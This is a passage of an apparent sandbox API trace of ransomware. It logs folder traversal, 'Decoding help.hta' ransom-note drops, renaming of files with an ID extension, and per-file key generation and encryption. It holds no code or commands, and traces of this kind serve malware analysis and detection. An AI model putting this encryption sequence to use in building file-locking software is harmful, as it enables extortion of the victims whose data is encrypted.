Office\\Office14\\1036\\*.*") returned 55 [0056.699] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1036\\", lpString2="MSO.ACL" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1036\\MSO.ACL") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1036\\MSO.ACL" [0056.699] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1036\\MSO.ACL" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1036\\MSO.ACL") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1036\\MSO.ACL" [0056.699] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1036\\MSO.ACL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1036\\MSO.ACL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1036\\MSO.ACL.[ID]g9uZrLhJaygpwRm1[ID]" [0056.699] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1036\\MSO.ACL" (normalized: "c:\\program files\\microsoft office\\office14\\1036\\mso.acl"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1036\\MSO.ACL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\office14\\1036\\mso.acl.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.254] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1036\\MSO.ACL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\office14\\1036\\mso.acl.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ac [0058.254] CreateFileMappingA (hFile=0x7ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xa30 [0058.254] CryptAcquireContextA (in: phProv=0x1eedfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1eedfcec*=0x34499b8) returned 1 [0060.188] CryptGenKey (in: hProv=0x34499b8, Algid=0x6610, dwFlags=0x1, phKey=0x1eedfce8 | out: phKey=0x1eedfce8*=0x42cf498) returned 1 [0060.188] CryptExportKey (in: hKey=0x42cf498, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1eedfbe4, pdwDataLen=0x1eedfce4 | out: pbData=0x1eedfbe4*, pdwDataLen=0x1eedfce4*=0x2c) returned 1 [0060.188] MapViewOfFile (hFileMappingObject=0xa30, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xaa20) returned 0x4490000 [0063.150] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1eedfbe4*, pdwDataLen=0x1eedfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1eedfbe4*, pdwDataLen=0x1eedfcf8*=0x100) returned 1 [0063.153] CryptEncrypt (in: hKey=0x42cf498, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4490000, pdwDataLen=0x1eedfce4*=0xaa20, dwBufLen=0xaa20 | out: pbData=0x4490000*, pdwDataLen=0x1eedfce4*=0xaa20) returned 1 [0063.918] UnmapViewOfFile (lpBaseAddress=0x4490000) returned 1 [0063.921] CloseHandle (hObject=0xa30) returned 1 [0063.921] CryptDestroyKey (hKey=0x42cf498) returned 1 [0063.921] CryptReleaseContext (hProv=0x34499b8, dwFlags=0x0) returned 1 [0063.921] SetFilePointerEx (in: hFile=0x7ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.921] WriteFile (in: hFile=0x7ac, lpBuffer=0x1eedfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1eedfcf8, lpOverlapped=0x0 | out: lpBuffer=0x1eedfbe4*, lpNumberOfBytesWritten=0x1eedfcf8*=0x100, lpOverlapped=0x0) returned 1 [0063.922] WriteFile (in: hFile=0x7ac, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1eedfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1eedfcf8*=0x500, lpOverlapped=0x0) returned 1 [0063.922] CloseHandle (hObject=0x7ac) returned 1 [0063.922] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1036\\MSO.ACL.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0063.922] FindNextFileW (in: hFindFile=0x5e33b0, lpFindFileData=0x1eedfd30 | out: lpFindFileData=0x1eedfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b069000, ftCreationTime.dwHighDateTime=0x1c99227, ftLastAccessTime.dwLowDateTime=0x779e270, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2b069000, ftLastWriteTime.dwHighDateTime=0x1c99227, nFileSizeHigh=0x0, nFileSizeLow=0xaa26, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSO.ACL", cAlternateFileName="")) returned 0 [0063.922] FindClose (hFindFile=0x5e33b0) Thread: id = 468 os_tid = 0x8e4 [0045.316] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\3082\\*.*", lpFindFileData=0x1f01fd30 | out: lpFindFileData=0x1f01fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a4f390, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5a4f390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5a4f390, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e33f0 [0045.533] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.533] FindNextFileW (in: hFindFile=0x5e33f0, lpFindFileData=0x1f01fd30 | out: lpFindFileData=0x1f01fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a4f390, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5a4f390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5a4f390, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.774] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.774] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.774] FindNextFileW (in: hFindFile=0x5e33f0, lpFindFileData=0x1f01fd30 | out: lpFindFileData=0x1f01fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d6ae900, ftCreationTime.dwHighDateTime=0x1c9922b, ftLastAccessTime.dwLowDateTime=0x5a4f390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2d6ae900, ftLastWriteTime.dwHighDateTime=0x1c9922b, nFileSizeHigh=0x0, nFileSizeLow=0xc57c, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSO.ACL", cAlternateFileName="")) returned 1 [0048.774] lstrcpyW (in: lpString1=0x9b01290, lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\3082\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\3082\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\3082\\*.*" [0048.774] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\3082\\*.*") returned 55 [0048.774] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\3082\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\3082\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\3082\\Decoding help.hta" [0048.774] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\3082\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\office14\\3082\\decoding help.hta")) returned 0xffffffff [0048.774] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\3082\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\office14\\3082\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0050.384] WriteFile (in: hFile=0x454, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1f01fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1f01fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0052.537] CloseHandle (hObject=0x454) returned 1 [0053.666] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\3082\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0057.620] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSO.ACL") returned -1 [0057.620] lstrlenW (lpString="MSO.ACL") returned 7 [0057.620] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\3082\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\3082\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\3082\\*.*" [0057.620] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\3082\\*.*") returned 55 [0057.620] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\3082\\", lpString2="MSO.ACL" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\3082\\MSO.ACL") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\3082\\MSO.ACL" [0057.620] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\3082\\MSO.ACL" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\3082\\MSO.ACL") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\3082\\MSO.ACL" [0057.620] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\3082\\MSO.ACL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\3082\\MSO.ACL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\3082\\MSO.ACL.[ID]g9uZrLhJaygpwRm1[ID]" [0057.620] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\3082\\MSO.ACL" (normalized: "c:\\program files\\microsoft office\\office14\\3082\\mso.acl"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\3082\\MSO.ACL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\office14\\3082\\mso.acl.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0057.620] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\3082\\MSO.ACL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\office14\\3082\\mso.acl.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x9c4 [0057.621] CreateFileMappingA (hFile=0x9c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x9c8 [0057.621] CryptAcquireContextA (in: phProv=0x1f01fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1f01fcec*=0x3448be8) returned 1 [0060.171] CryptGenKey (in: hProv=0x3448be8, Algid=0x6610, dwFlags=0x1, phKey=0x1f01fce8 | out: phKey=0x1f01fce8*=0x42cf0d8) returned 1 [0060.171] CryptExportKey (in: hKey=0x42cf0d8, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1f01fbe4, pdwDataLen=0x1f01fce4 | out: pbData=0x1f01fbe4*, pdwDataLen=0x1f01fce4*=0x2c) returned 1 [0060.171] MapViewOfFile (hFileMappingObject=0x9c8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc560) returned 0x2fd0000 [0062.677] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1f01fbe4*, pdwDataLen=0x1f01fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1f01fbe4*, pdwDataLen=0x1f01fcf8*=0x100) returned 1 [0062.679] CryptEncrypt (in: hKey=0x42cf0d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2fd0000, pdwDataLen=0x1f01fce4*=0xc560, dwBufLen=0xc560 | out: pbData=0x2fd0000*, pdwDataLen=0x1f01fce4*=0xc560) returned 1 [0063.825] UnmapViewOfFile (lpBaseAddress=0x2fd0000) Thread: id = 469 os_tid = 0x8dc [0045.318] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\*.*", lpFindFileData=0x1f15fd30 | out: lpFindFileData=0x1f15fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2bb0 [0045.319] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.319] FindNextFileW (in: hFindFile=0x5e2bb0, lpFindFileData=0x1f15fd30 | out: lpFindFileData=0x1f15fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.319] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.319] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.319] FindNextFileW (in: hFindFile=0x5e2bb0, lpFindFileData=0x1f15fd30 | out: lpFindFileData=0x1f15fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0045.319] FindClose (in: hFindFile=0x5e2bb0 | out: hFindFile=0x5e2bb0) returned 1 Thread: id = 470 os_tid = 0x8e0 [0045.321] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*.*", lpFindFileData=0x1f29fd30 | out: lpFindFileData=0x1f29fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabe4080, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2b30 [0045.321] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.321] FindNextFileW (in: hFindFile=0x5e2b30, lpFindFileData=0x1f29fd30 | out: lpFindFileData=0x1f29fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabe4080, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.321] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.321] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.321] FindNextFileW (in: hFindFile=0x5e2b30, lpFindFileData=0x1f29fd30 | out: lpFindFileData=0x1f29fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfac0a1e0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfac0a1e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeAdditional_amd64", cAlternateFileName="VCRUNT~1")) returned 1 [0045.322] lstrcmpW (lpString1=".", lpString2="vcRuntimeAdditional_amd64") returned -1 [0045.322] lstrcmpW (lpString1="..", lpString2="vcRuntimeAdditional_amd64") returned -1 [0045.322] lstrcmpiW (lpString1="windows", lpString2="vcRuntimeAdditional_amd64") returned 1 [0047.397] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*.*" [0047.397] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*.*") returned 95 [0047.397] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\", lpString2="vcRuntimeAdditional_amd64" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64" [0047.397] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*" [0047.397] GlobalMemoryStatus (in: lpBuffer=0x1f29fd10 | out: lpBuffer=0x1f29fd10) [0047.397] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x115a9598, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x644 [0047.411] CloseHandle (hObject=0x644) returned 1 [0047.412] FindNextFileW (in: hFindFile=0x5e2b30, lpFindFileData=0x1f29fd30 | out: lpFindFileData=0x1f29fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfac0a1e0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfac0a1e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeAdditional_amd64", cAlternateFileName="VCRUNT~1")) returned 0 [0047.412] FindClose (in: hFindFile=0x5e2b30 | out: hFindFile=0x5e2b30) returned 1 Thread: id = 471 os_tid = 0xaec [0045.322] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\*.*", lpFindFileData=0x1f3dfd30 | out: lpFindFileData=0x1f3dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf59f9270, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xaf577d00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xaf577d00, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e3630 [0045.557] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.557] FindNextFileW (in: hFindFile=0x5e3630, lpFindFileData=0x1f3dfd30 | out: lpFindFileData=0x1f3dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf59f9270, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xaf577d00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xaf577d00, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.591] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0051.591] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0051.591] FindNextFileW (in: hFindFile=0x5e3630, lpFindFileData=0x1f3dfd30 | out: lpFindFileData=0x1f3dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14ebe6b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x15087730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x15087730, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Access", cAlternateFileName="")) returned 1 [0051.591] lstrcmpW (lpString1=".", lpString2="Access") returned -1 [0051.591] lstrcmpW (lpString1="..", lpString2="Access") returned -1 [0051.591] lstrcmpiW (lpString1="windows", lpString2="Access") returned 1 [0051.591] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\*.*" [0051.591] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\*.*") returned 56 [0051.591] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\", lpString2="Access" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access" [0051.591] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\*.*" [0051.591] GlobalMemoryStatus (in: lpBuffer=0x1f3dfd10 | out: lpBuffer=0x1f3dfd10) [0051.592] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5c301e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x41c [0051.955] CloseHandle (hObject=0x41c) returned 1 [0051.955] FindNextFileW (in: hFindFile=0x5e3630, lpFindFileData=0x1f3dfd30 | out: lpFindFileData=0x1f3dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b18ae00, ftCreationTime.dwHighDateTime=0x1ca911e, ftLastAccessTime.dwLowDateTime=0x1e16f270, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3b18ae00, ftLastWriteTime.dwHighDateTime=0x1ca911e, nFileSizeHigh=0x0, nFileSizeLow=0x329e7, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdjacencyLetter.dotx", cAlternateFileName="ADJACE~1.DOT")) returned 1 [0051.955] lstrcpyW (in: lpString1=0x10f14ea8, lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\*.*" [0051.955] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\*.*") returned 56 [0051.955] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Decoding help.hta" [0051.955] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\decoding help.hta")) returned 0xffffffff [0051.956] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x778 [0053.664] WriteFile (in: hFile=0x778, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1f3dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1f3dfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0056.461] CloseHandle (hObject=0x778) returned 1 [0057.604] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0057.604] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AdjacencyLetter.dotx") returned 1 [0057.604] lstrlenW (lpString="AdjacencyLetter.dotx") returned 20 [0057.604] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\*.*" [0057.604] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\*.*") returned 56 [0057.604] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\", lpString2="AdjacencyLetter.dotx" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\AdjacencyLetter.dotx") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\AdjacencyLetter.dotx" [0057.604] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\AdjacencyLetter.dotx" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\AdjacencyLetter.dotx") returned="\\\\?\\C:\\Program Files\\Microsoft 